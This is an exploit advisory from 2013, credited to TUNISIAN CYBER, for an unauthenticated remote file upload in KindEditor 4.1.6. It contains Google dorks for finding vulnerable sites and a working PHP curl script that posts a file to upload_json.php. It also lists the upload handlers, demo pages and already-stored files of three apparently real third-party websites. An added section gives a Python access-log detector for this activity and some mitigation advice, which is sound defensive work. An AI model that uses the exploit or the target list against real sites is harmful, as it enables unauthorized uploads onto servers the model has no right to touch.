
KindEditor 4.1.6 Remote File Upload Vulnerability

Author: TUNISIAN CYBER, Published: 16-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: KindEditor 4.1.6 Remote File Upload Vulnerability
[+] Date: 16-12-2013
[+] Category: WebApp
[+] Vendor: https://code.google.com/p/kindeditor/downloads/detail?name=kindeditor-4.1.6.zip&can=2&q=
[+] Google Dork: inurl:"kindeditor/examples/uploadbutton.html"
inurl:"kindeditor/php"
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
Vulnerability in previous versions (3.x up to 4.1.5) by KedAns-DZ:
http://1337day.com/exploit/20494

Method 1:
Exploit using PHP. The script POSTs a local file as the "imgFile" form field to php/upload_json.php?dir=file, the same request the editor's own upload widget sends; no session or token is required, which is the bug. The demo uploads a plain .txt file; the handler filters on file extension, so what else can be stored depends on the deployment's allow-list.
<?php
echo "=============================================== \n";
echo "   KindEditor 4.1.6 File Upload Vulnerability   \n";
echo "                 TUNISIAN CYBER   \n";
echo "=============================================== \n\n";

// Local file to upload and the unauthenticated upload handler.
$uploadfile = "TUNISIAN.txt";
$target = "http://127.0.0.1/kindeditor-4.1.6/php/upload_json.php?dir=file";

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);
// The handler reads the upload from the "imgFile" form field.
// CURLFile (PHP 5.5+) replaces the old "@filename" upload syntax.
$file = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";
curl_setopt($ch, CURLOPT_POSTFIELDS, array('imgFile' => $file));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// Print the handler's JSON response; on success it carries the stored file URL.
print "$postResult\n";
?>


Method 2:
Using the shipped demo page "uploadbutton.html". The editor's examples directory contains a demo page that posts to the same unauthenticated upload_json.php handler; where it has been left deployed, the upload can be performed from a browser:
127.0.0.1/path/kindeditor/examples/uploadbutton.html

PoC screenshot: http://oi41.tinypic.com/n2g32w.jpg

Demo:
Upload handlers:
http://staic.qefeng.com/Kindeditor/php/upload_json.php?dir=file
http://www.fkcasings.com/kindeditor/php/upload_json.php?dir=file
http://zijingwang.org//xtw/include/kindeditor/php/upload_json.php?dir=file
===============================
Shipped demo pages:
http://staic.qefeng.com/Kindeditor/examples/uploadbutton.html
http://www.fkcasings.com/kindeditor/examples/uploadbutton.html
http://zijingwang.org/xtw/include/kindeditor/examples/uploadbutton.html
===============================
Files stored by the handler (note the attached/<dir>/YYYYMMDD/YYYYMMDDHHMMSS_NNNNN.txt naming):
http://staic.qefeng.com//Kindeditor/attached/file/20131217/20131217041625_73120.txt
http://www.fkcasings.com//kindeditor/attached/file/20131216/20131216195330_68287.txt
http://zijingwang.org//xtw/include/kindeditor/attached/file/20131217/20131217041654_12491.txt
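The same activity seen from the defender's side, as an added example that is not part of the original advisory: the script parses web server access logs in Apache/nginx "combined" format and flags hits on the shipped demo page, POSTs to upload_json.php, and fetches of files under attached/<dir>/YYYYMMDD/YYYYMMDDHHMMSS_NNNNN.<ext>, the path shape visible in the demo URLs above; a client that uploads and then fetches from the same directory is reported as a completed chain. The log lines, hostname and IP addresses are constructed for the example.

```python
"""Flag unauthenticated KindEditor uploads in web server access logs.

Added example (not from the original advisory). Assumes "combined" log
format; the log lines, host and IPs below are constructed.
"""
import re
from collections import defaultdict

# Apache/nginx "combined" format.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The upload handler named in the advisory, with its dir parameter.
UPLOAD_RE = re.compile(r'/upload_json\.php\?(?:\S*&)?dir=(?P<dir>[A-Za-z]+)', re.I)
# Stored-file path shape from the advisory's demo URLs:
# .../attached/<dir>/YYYYMMDD/YYYYMMDDHHMMSS_<digits>.<ext>
STORED_RE = re.compile(
    r'/attached/(?P<dir>[A-Za-z]+)/(?P<day>\d{8})/(?P=day)\d{6}_\d+\.(?P<ext>[A-Za-z0-9]+)$',
    re.I,
)
# The shipped demo page used in Method 2 (also the advisory's Google dork).
PROBE_RE = re.compile(r'/examples/uploadbutton\.html$', re.I)

# Constructed sample: one attacker-like chain, one ordinary editor upload.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Dec/2013:19:52:10 +0000] "GET /kindeditor/examples/uploadbutton.html HTTP/1.1" 200 2731 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Dec/2013:19:53:30 +0000] "POST /kindeditor/php/upload_json.php?dir=file HTTP/1.1" 200 118 "http://www.example.com/kindeditor/examples/uploadbutton.html" "Mozilla/5.0"
203.0.113.7 - - [16/Dec/2013:19:53:41 +0000] "GET /kindeditor/attached/file/20131216/20131216195330_68287.txt HTTP/1.1" 200 15 "-" "Mozilla/5.0"
198.51.100.22 - - [16/Dec/2013:20:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.22 - - [16/Dec/2013:20:01:09 +0000] "POST /cms/kindeditor/php/upload_json.php?dir=image HTTP/1.1" 200 121 "http://www.example.com/admin/post.php" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(lines):
    """Classify requests and correlate upload -> stored-file fetch per client IP."""
    findings = {"probes": [], "uploads": [], "stored": [], "chains": set()}
    uploaded_by = defaultdict(set)  # ip -> set of dirs it POSTed to
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, method = rec["ip"], rec["method"]
        path_only = rec["path"].split("?", 1)[0]
        if PROBE_RE.search(path_only):
            findings["probes"].append(ip)
        up = UPLOAD_RE.search(rec["path"])
        if method == "POST" and up:
            # A referer pointing at the demo page means the shipped example was used.
            via_demo = bool(PROBE_RE.search(rec["referer"].split("?", 1)[0]))
            findings["uploads"].append({
                "ip": ip, "dir": up["dir"].lower(), "status": rec["status"],
                "from_demo_page": via_demo, "path": rec["path"],
            })
            uploaded_by[ip].add(up["dir"].lower())
        st = STORED_RE.search(path_only)
        if method == "GET" and st:
            findings["stored"].append({
                "ip": ip, "dir": st["dir"].lower(), "ext": st["ext"].lower(), "path": rec["path"],
            })
            # Same client uploaded into this dir earlier in the log: completed chain.
            if st["dir"].lower() in uploaded_by[ip]:
                findings["chains"].add(ip)
    return findings


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG.splitlines())
    for up in result["uploads"]:
        tag = "via shipped demo page" if up["from_demo_page"] else "referer elsewhere"
        print(f"upload  {up['ip']} dir={up['dir']} status={up['status']} ({tag})")
    for st in result["stored"]:
        print(f"fetch   {st['ip']} {st['path']}")
    print("chains:", sorted(result["chains"]))
```

Legitimate editor use also POSTs to upload_json.php, so the POST alone is a weak signal; the referer from the examples directory and the upload-then-fetch chain from one client are what separate the advisory's scenario from normal traffic. Removing the examples directory from production and putting the handler behind the application's authentication removes both indicators at the source.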
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt,sec4ever
